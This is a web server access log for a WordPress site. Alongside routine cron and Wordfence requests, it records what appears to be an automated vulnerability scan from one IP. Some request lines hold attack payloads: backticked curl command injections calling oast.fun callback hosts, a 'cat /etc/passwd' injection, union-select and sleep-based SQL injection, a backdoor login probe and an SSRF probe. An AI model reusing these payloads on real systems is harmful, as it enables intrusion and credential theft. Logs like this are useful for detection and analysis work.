165.232.54.158 - - [13/Jan/2026:18:44:01 +0800] "POST /checkValid HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:44:12 +0800] "POST /wp-cron.php?doing_wp_cron=1768301052.2684099674224853515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:44:09 +0800] "GET /public/css/38Btk9wygkgl4qVrFjYQ0k4JqUB.css HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:44:30 +0800] "POST /wp-cron.php?doing_wp_cron=1768301070.3306300640106201171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:44:27 +0800] "POST /service/v1/createUser HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:44:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768301098.5615160465240478515625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:44:55 +0800] "POST /login.htm HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:45:53 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:46:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768301194.1887218952178955078125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:46:32 +0800] "POST /?wordfence_syncAttackData=1768301192.5482 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:46:30 +0800] "POST /cgi-bin/system_mgr.cgi HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:18:46:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768301205.4158511161804199218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:46:42 +0800] "POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:109.0) Gecko/20100101 Firefox/115.0"
103.4.122.14 - - [13/Jan/2026:18:47:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768301252.1062219142913818359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:47:30 +0800] "POST /?wordfence_syncAttackData=1768301250.5965 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:47:28 +0800] "GET /wp-content/plugins/loginizer/readme.txt HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [13/Jan/2026:18:48:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768301286.4915990829467773437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:48:03 +0800] "GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:48:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768301290.4393229484558105468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:18:48:08 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:50:38 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
165.232.54.158 - - [13/Jan/2026:18:56:27 +0800] "GET / HTTP/1.1" 403 199 "-" "Mozilla/5.0 (SS; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:18:56:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768301803.6400759220123291015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:56:40 +0800] "GET /include/makecvs.php?Event=%60curl+http%3a//d5iu610i9qj8svou82p0meb1zuuhxfm6h.oast.fun+-H+'User-Agent%3a+IvyUwp'%60 HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:18:56:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768301812.9319789409637451171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:56:50 +0800] "GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d5iu610i9qj8svou82p0d59zfi17rwwth.oast.fun+-H+'User-Agent%3a+IvyUwp'%60 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/17.1.15"
103.4.122.14 - - [13/Jan/2026:18:57:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768301863.6419210433959960937500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:57:40 +0800] "POST /convert HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [13/Jan/2026:18:57:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768301874.2914640903472900390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:18:57:51 +0800] "GET /file/ahtxUB.txt HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:18:57:59 +0800] "GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26cat%20/etc/passwd%26%27&PW HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
165.232.54.158 - - [13/Jan/2026:19:01:56 +0800] "POST /goform/setSysAdm HTTP/1.1" 404 10865 "https://nutritaste.com.au/login.shtml" "Mozilla/5.0 (Debian; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
103.4.122.14 - - [13/Jan/2026:19:01:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768302119.6327819824218750000000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
207.246.255.44 - - [13/Jan/2026:19:02:02 +0800] "POST / HTTP/1.1" 200 44 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:02:05 +0800] "POST /assets/php/upload.php HTTP/1.1" 403 6628 "http://nutritaste.com.au" "Mozilla/5.0 (SS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:19:02:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768302134.6947970390319824218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:19:02:13 +0800] "POST /?wordfence_syncAttackData=1768302133.2098 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:02:11 +0800] "GET /assets/data/usrimg/38btjwjbfjibpy60zxtj6r6i5qh.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:02:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768302148.3562641143798828125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:02:25 +0800] "POST /actions/authenticate.php HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:04:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768302274.6833150386810302734375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:04:31 +0800] "POST /auth/check HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:04:34 +0800] "POST /admin/ajax.php?action=login HTTP/1.1" 404 10874 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:04:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768302284.9482409954071044921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:04:42 +0800] "GET /admin/index.php?page=home HTTP/1.1" 301 - "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [13/Jan/2026:19:05:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768302331.6638278961181640625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:05:28 +0800] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 200 10775 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
103.4.122.14 - - [13/Jan/2026:19:05:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768302341.3730299472808837890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:05:38 +0800] "POST /index.php?m=home&a=assign_resume_tpl HTTP/1.1" 200 10775 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:05:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768302355.2133150100708007812500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:05:52 +0800] "POST /auth/newpassword HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0"
103.4.122.14 - - [13/Jan/2026:19:06:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768302410.2041831016540527343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:06:47 +0800] "GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1" 301 - "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/129.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:06:47 +0800] "POST /incom/modules/uploader/showcase/script.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0"
165.232.54.158 - - [13/Jan/2026:19:06:56 +0800] "GET /ext-js/index.html HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:06:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768302419.2768070697784423828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:06:56 +0800] "GET /upload/userfiles/image/38Btk8gYHz2168DSUqtATry0QTw.png HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1"
103.4.122.14 - - [13/Jan/2026:19:09:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768302568.7122430801391601562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:09:25 +0800] "POST /auth/check HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362"
103.4.122.14 - - [13/Jan/2026:19:09:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768302577.2584910392761230468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:09:34 +0800] "POST /auth/requestreset HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0"
103.4.122.14 - - [13/Jan/2026:19:12:17 +0800] "POST /wp-cron.php?doing_wp_cron=1768302737.6488039493560791015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:12:14 +0800] "GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:19:12:49 +0800] "POST /wp-cron.php?doing_wp_cron=1768302769.5030729770660400390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:12:46 +0800] "POST /auth/requestreset HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:19:12:57 +0800] "POST /wp-cron.php?doing_wp_cron=1768302777.2419769763946533203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:12:54 +0800] "POST /auth/requestreset HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6.1 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:13:38 +0800] "POST /wp-cron.php?doing_wp_cron=1768302818.6521580219268798828125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:13:35 +0800] "GET /register/ HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:14:41 +0800] "GET /wp-admin/admin-post.php?do_reset_wordpress=1 HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:15:58 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:17:26 +0800] "POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1" 403 6627 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12.4) AppleWebKit/619.11 (KHTML, like Gecko) Version/17.3.56 Safari/619.11"
103.4.122.14 - - [13/Jan/2026:19:18:10 +0800] "POST /wp-cron.php?doing_wp_cron=1768303090.1477530002593994140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [13/Jan/2026:19:18:08 +0800] "POST /?wordfence_syncAttackData=1768303088.5839 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:18:06 +0800] "GET /wp-content/plugins/wp-fastest-cache/ HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (X11; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:19:18:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768303130.6918489933013916015625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:18:47 +0800] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
165.232.54.158 - - [13/Jan/2026:19:18:54 +0800] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
103.4.122.14 - - [13/Jan/2026:19:19:42 +0800] "POST /wp-cron.php?doing_wp_cron=1768303182.7732930183410644531250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:19:39 +0800] "POST /sdk/ HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:20:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768303237.6781210899353027343750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:20:34 +0800] "POST /dfsms/ HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:21:12 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:24:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768303458.5428979396820068359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:24:15 +0800] "GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1" 301 - "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0"
103.4.122.14 - - [13/Jan/2026:19:24:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768303498.6496000289916992187500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:24:55 +0800] "POST /os/mxperson HTTP/1.1" 404 10866 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:25:05 +0800] "POST /wp-cron.php?doing_wp_cron=1768303505.3798859119415283203125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:25:02 +0800] "POST /meaweb/os/mxperson HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:25:45 +0800] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [13/Jan/2026:19:25:48 +0800] "POST /wp-cron.php?doing_wp_cron=1768303548.6756479740142822265625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:25:45 +0800] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:27:09 +0800] "POST /wp-cron.php?doing_wp_cron=1768303629.7029290199279785156250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:27:06 +0800] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d5iu610i9qj8svou82p0469enxjgaeh9c.oast.fun%23 HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:19:27:16 +0800] "POST /wp-cron.php?doing_wp_cron=1768303636.2735679149627685546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:27:13 +0800] "POST /api/jsonws/invoke HTTP/1.1" 404 10865 "https://nutritaste.com.au/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
165.232.54.158 - - [13/Jan/2026:19:27:13 +0800] "POST /api/jsonws/invoke HTTP/1.1" 404 10865 "https://nutritaste.com.au/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
165.232.54.158 - - [13/Jan/2026:19:27:14 +0800] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 10869 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
103.4.122.14 - - [13/Jan/2026:19:27:20 +0800] "POST /wp-cron.php?doing_wp_cron=1768303640.2522990703582763671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:27:17 +0800] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:29:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768303794.6884839534759521484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:29:50 +0800] "POST /session/create HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:30:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768303808.4387450218200683593750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:30:05 +0800] "POST /eonapi/createEonUser?username=admin&apiKey=182db4b95475a4937d9e4b5c9e44c1732beb86e73462a4d92718e95186a64d12 HTTP/1.1" 404 10868 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [13/Jan/2026:19:32:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768303938.7403120994567871093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:32:15 +0800] "GET /graph_realtime.php?action=init HTTP/1.1" 404 10886 "-" "Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:33:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768303980.8658609390258789062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:32:57 +0800] "POST /magmi/web/magmi_saveprofile.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:33:08 +0800] "POST /wp-cron.php?doing_wp_cron=1768303988.2728459835052490234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:33:05 +0800] "POST /magmi/web/magmi_run.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768303994.2160830497741699218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:33:11 +0800] "GET /magmi/web/info.php HTTP/1.1" 404 10859 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3.1 Safari/605.1.15"
165.232.54.158 - - [13/Jan/2026:19:33:36 +0800] "GET /eonapi/getApiKey?username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [13/Jan/2026:19:33:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768304017.1795120239257812500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:33:34 +0800] "GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [13/Jan/2026:19:33:39 +0800] "GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
103.4.122.14 - - [13/Jan/2026:19:33:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768304020.6447210311889648437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:33:37 +0800] "GET /?app=main&inc=core_auth&route=login HTTP/1.1" 200 16322 "https://nutritaste.com.au/index.php?app=main&inc=core_auth&route=login" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [13/Jan/2026:19:35:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768304147.6447119712829589843750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:35:44 +0800] "POST /getcfg.php HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
103.4.122.14 - - [13/Jan/2026:19:36:06 +0800] "POST /wp-cron.php?doing_wp_cron=1768304166.4963719844818115234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [13/Jan/2026:19:36:03 +0800] "POST /account/index.php HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0"
